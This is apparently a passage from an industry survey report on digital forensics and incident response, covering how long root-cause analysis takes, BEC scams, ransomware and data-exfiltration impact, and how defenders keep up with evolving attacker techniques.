<p><b>FINDING #1: </b>Digital Forensics is Increasingly About Incident Response </p>
Today’s DFIR professionals are more likely than not to be considered part of the organization’s broader security operations (SecOps) function, which speaks to the shifting nature of where their expertise is applied.
LEARN MORE >
Nearly one third of respondents indicated that identifying the root cause of incidents—which is crucial for containing the threat and strengthening security postures—requires either a complete overhaul (10%) or at least major improvements (23%).
42% of DFIR professionals report that evolving cyberattack techniques are either a large or extreme problem for investigations, illustrating that it’s essential that DFIR teams are equipped to keep pace with adversaries’ expansive and growing arsenal of TTPs.
For many years, digital forensics within a corporate setting applied primarily to resolving human resources issues (e.g., personnel disputes, harassment complaints), assessing policy violations (e.g., misuse of corporate assets), fulfilling legal obligations (e.g., eDiscovery), and investigating malicious insiders (e.g., fraud, data exfiltration, and intellectual property theft). For such use cases, dead box forensics was typically used to investigate specific endpoints or malicious insiders.
However, as the digital transformation opened up new attack vectors and made it easier for threat actors — particularly external adversaries — to conduct their operations, investigations became more complex, and forensics became more important. One result of this trend is that the tools and techniques of digital forensics are increasingly being integrated into formalized incident response (IR), the processes and activities that allow organizations to:
Identify, contain, resolve, and recover from cyberattacks;
Prepare evidence that can be used to support insurance claims, pursue legal avenues, and demonstrate duty of care to regulators; and
Inform strategies and tactics to harden defenses against future attacks.
Recent high-profile breaches and relentless innovation in cyberattacks have led to a shift in how organizations perceive risk, with many recognizing that the important question is not if a breach will occur but when. This “assume breach” mentality forces organizations to make sure they’re prepared to handle a security incident, and is a driving force behind the Zero Trust (ZT) cybersecurity paradigm.
A related outcome is that organizations have increased their investment in technologies, including deep-dive analysis capabilities, that support a more robust incident response. These technologies help ensure thatorganizations are prepared when a breach actually does occur. This has necessitated a migration from dead box forensics (which can be slow and logistically challenging) to a more dynamic approach that enables deep analysis without needing a full forensic acquisition.
The increasing sophistication of attacker TTPs requires an increasingly sophisticated response. As organizational defenders, incident responders and forensic investigators are working together to uncover the root cause of incidents in order to harden their environments and improve their security controls.”
The growing emphasis on digital forensics as a crucial component of cybersecurity overall, and incident response in particular, is changing how organizations are structured. In general, today’s corporate DFIR professionals are considered part of the organization’s security operations (SecOps) team, within the security operations center (SOC).
For smaller organizations, there’s a 50% chance that personnel fulfilling DFIR functions are within the SOC, but the likelihood increases as the organization becomes larger, peaking with 77% for professionals within companies that have 2,500 to 4,999 employees. At 10,000 employees or more, DFIR professionals are more likely than not to be part of a dedicated DFIR group.
Cyberattackers employ a lot of different techniques to gain initial access into IT environments, and while identifying the root cause of an incident isn’t easy (51% of respondents regard doing so as at least moderately challenging), few DFIR activities are as worthwhile. That’s because containing an event, recovering from it (where applicable), and learning lessons all require, or at least strongly benefit from, accurately determining the incident’s root cause.
Crucially, these learnings contribute to a feedback loop that guides organizations as they implement new safeguards and processes, such as updating response plans and identifying missing or required control points as part of their standard IR plan, that reduce the likelihood of future incidents. Additionally, digital forensics is critical to identifying the scope of a breach. For example, pinpointing a few hosts that exhibited lateral movement or data exfiltration isn’t enough to determine if the preliminary breach or toolset remains elsewhere in the environment. Digital forensics can help root out attacker infrastructure and help to shut down a repeat incident.
The longer it takes to identify the root cause of a cybersecurity incident, the greater the threat to business continuity. While 17% of respondents reported that it takes less than 24 hours, on average, to determine the root cause (Figure 2), more than a third (36%) said that doing so takes between one day and one week. More worryingly, 22% indicated that it takes between one week and one month, and 21% reported that finding the root cause takes even longer than that.
These findings should concern security leaders, as delays open up opportunities for further attacks and disruption—after all, if you don’t know how an adversary got in, then how will you keep them out in the future? For their part, DFIR professionals already recognize the need for improvements. When asked to what extent their organization needs to improve upon several DFIR functions, 10% of respondents indicated that identifying the root cause of incidents required a complete overhaul, and a further 23% suggested that major improvements were necessary.
The ability to get to root cause depends heavily on the resources of the team responsible. If the analysts are spending most of their time on whack-amole malware activities, there isn’t proper time for root cause analysis.”
Put another way, 33% of corporate DFIR experts—one out of every three—are reporting that a critical ability requires considerable investments (and if the 10% figure doesn’t seem ‘big enough,’ we’ll note that no other function received such support for an overhaul).
When you can identify and close the gaps discovered through root cause analysis, threat actors can no longer exploit the same vulnerability again, so teams can work towardsa gradual reduction in breaches in addition to reducing the overall attack surface.”
ROOT CAUSE: TIME TO DETERMINE
The evolution of DFIR shows up in the incidents that organizations most frequently encounter (Figure 3), as adversary-driven security events top the list. Data exfiltration or IP theft takes the number one spot, with 35% of respondents indicating that their organization encounters this type of security incident at least somewhat to very frequently.
While data exfiltration or IP theft are the most frequent events encountered, the three most common ways an organization can become a victim of such a data breach are double-extortion ransomware, business email compromise (BEC) scams, or a malicious insider—with ransomware being the most likely culprit.
We’ll examine ransomware and data exfiltration or IP theft more in a moment, but first we’ll look at BEC. These scams, in which a cybercriminal pretends to be a trusted contact and attempts to trick the recipient into transferring funds or information can be especially damaging (the FBI reported in May 2022 that exposed losses from such scams added to $43 billion, globally). Once funds have been transferred, they can be very difficult to recover, as scammers use bank transfers and cryptocurrency tumblers to immediately move the proceeds of their crimes elsewhere. Likewise, if intellectual property, trade secrets, personally identifiable information (PII), or any other digital data is sent to a fraudster, the victim organization cannot control or prevent it from spreading further.
Unfortunately, large amounts of publicly available information (e.g., about partners, vendors, etc.) is available to help threat actors develop highly convincing lures. Add in the small likelihood of prosecution, and a range of techniques to execute these attacks (e.g., spoofing, spearphishing, malware), and conditions are ripe for widespread attacks. In fact, 14% of survey respondents indicated that their organization encounters BEC scams very frequently.
BEC scams rely heavily upon social engineering tactics to create a feeling of trust, allowing attackers to trick users. Especially sophisticated BEC scams may employ malware like Emotet or Qakbot (which themselves are often introduced via social engineering) that can hijack existing email threads, making the scammer’s actions seem even more credible. Consequently, one of the most important defenses against these types of attacks is to invest in an effective phishing and security awareness training (PSAT) program to help increase awareness of such threats and build the organization’s cyber resilience.
In addition to having preventative measures in place (e.g., PSAT, a vulnerability management program,endpoint defenses, detection andresponse capabilities etc.), organizations should keep detailed logs that can be incorporated into forensic investigations. Moreover, having a simple way for employees to report suspicious emails— along with an amnesty policy—can encourage a culture of vigilance.
Organization Security incidents can have significant impacts to organizations and the impacts are not limited to direct costs (e.g.,ransoms paid) or for the duration of the attack. For example, IBM’s much-cited Cost of a Data Breach report incorporates four process-related activities into its expenses:
Detection and escalation: Activities that enable a company to reasonably detect the breach, including forensic and investigative activities, assessment and audit services, crisis management, and communications to executives and boards
Notification: Activities that enable the company to notify data subjects, data protection regulators and other third parties, including: emails, letters, outbound calls or general notice to data subjects; determination of regulatory requirements;communication with regulators; and engagement of outside experts
Post-incident response: Activities to help victims of a breach communicate with the company and redress activities to victims and regulators, including: help desk and inbound communications; credit monitoring and identity protection services; issuing new accounts or credit cards; legal expenditures; product discounts; and regulatory fines
Lost business: Business disruption and revenue losses, including: business disruption and revenue losses from system downtime; cost of losing customers and acquiring new customers; and reputation losses and diminished goodwill With such costs and consequences in mind, the survey respondents indicated that ransomware-infected endpoints have the highest impact to their respective organizations or clients (Figure 4).
IMPACT OF INCIDENTS (HIGHEST TO LOWEST)
Unfortunately, a mature ransomware ecosystem has flourished and attackers (e.g., LockBit, Alphv and Black Basta to name a few) are good at applying pressure to extract payments. In this new threat landscape, cybercrime perpetrators called initial access brokers (IABs) operate broad campaigns to enter dozens, hundreds, or even thousands of IT environments. Next, they perform some reconnaissance activities to identify the network owner (i.e., the organization), establish some degree of persistence, and gather additional intelligence. Then, they post the details of the compromised network (e.g., scale of compromise/infiltration, victim’s industry, victim’s annual revenue, etc.) on a cybercrime marketplace.
From there, a ransomware gang (or an affiliate) simply purchases the access and executes the ransomware attack, which typically combines the disruption of making systems and data unavailable with exfiltration of sensitive data and the very real threat of publicly releasing it.
In addition to causing potential embarrassment and personal friction (e.g., through the publication of HR files, personnel details, correspondence from executives, salary data, etc.) and harming competitive positions in the marketplace (e.g., by posting trade secrets and other IP), threat actors know that publishing private data can lead to costly regulatory fines for the victim (e.g., when it includes PII).
This is likely why the survey respondents rated data exfiltration or IP theft as having the second-highest impact overall. However, it received the most responses (19%) for the highest severity rating than ransomware (16%) (Figure 4). A plausible interpretation is that the short-term disruption directly associated with the ransomware (e.g., system and data unavailability) is regarded as less severe than the long-term consequences of the data breach component. Clearly, adversaries have found a very real pain point they can use to apply pressure for ransom payments.
Both to contain damage and to make sure the cycle of hardening defenses is helpful, it’s critical that DFIR professionals be equipped to rapidly investigate ransomware and data breach incidents. However, cybercriminals are hard at work to make such investigations as difficult as possible.
In recent years, the vulnerability of the software supply chain has been driven home repeatedly. The full-service cybercrime economy has virtually eliminated barriers to entry and zero-day exploits have impacted tens of thousands of organizations (e.g., ProxyLogon). Complicating matters further, threat actors have discovered TTPs that make it especially hard to detect, contain, and investigate their intrusions. For example, the use of stolen credentials has soared, as have attacks that target or leverage identity systems, both of which can make it even harder to separate intruders from insiders. In parallel, the increased use of built-in system commands (living-off-the-land binaries, or “LOLBins”) has made it much more difficult to detect intrusion actions against the backdrop of legitimate activity. Unfortunately, the continued innovation of threat actors reaps them great rewards. Cybercrime proceeds have soared in recent years (although there are signs that more organizations are choosing not to pay ransoms), and 42% of corporate DFIR professionals indicated that evolving cyberattack techniques pose either an extreme or large problem for their investigations. This result placed evolving cyberattack techniques ahead of all other factors listed by the survey and, worryingly represents a 50% increase over last year’s figure of 28%.
of DFIR professionals indicate that evolving cyberattack techniques present either an extreme or large problem for their investigations.
For what it’s worth, in the first edition of this report (published in 2021), DFIR professionals identified evolving cyberattack techniques as the most concerning trend. They’ve been sounding the alarm for at least a few years, and organizations would do well to listen.
KEEPING UP WITH CHANGING TTPSMany cybercrime gangs operate like Fortune 500 companies—complete with R&D specialists focused on equipping the organization with new and ever-evolving TTPs. Staying up to date is a real challenge, but here are a few tips:
Follow the social media profiles/channels (e.g., Twitter, LinkedIn) of cybersecurity researchers and companies, as they’ll often post their own research or share/promote the research of industry peers
Faced with the uncertain future of Twitter, the infosec.exchange Mastodon instance has gained new prominence
Government and industry organizations (e.g., MITRE, CISA), and cybersecurity-specific news media are also great sources of intelligence
Search engine alerts, security mailing lists, and topic-specific social networking groups can also keep you apprised of the latest developments
By leveraging a cross-section of sources, you can increase the chances that important topics land in your inbox or alert stream!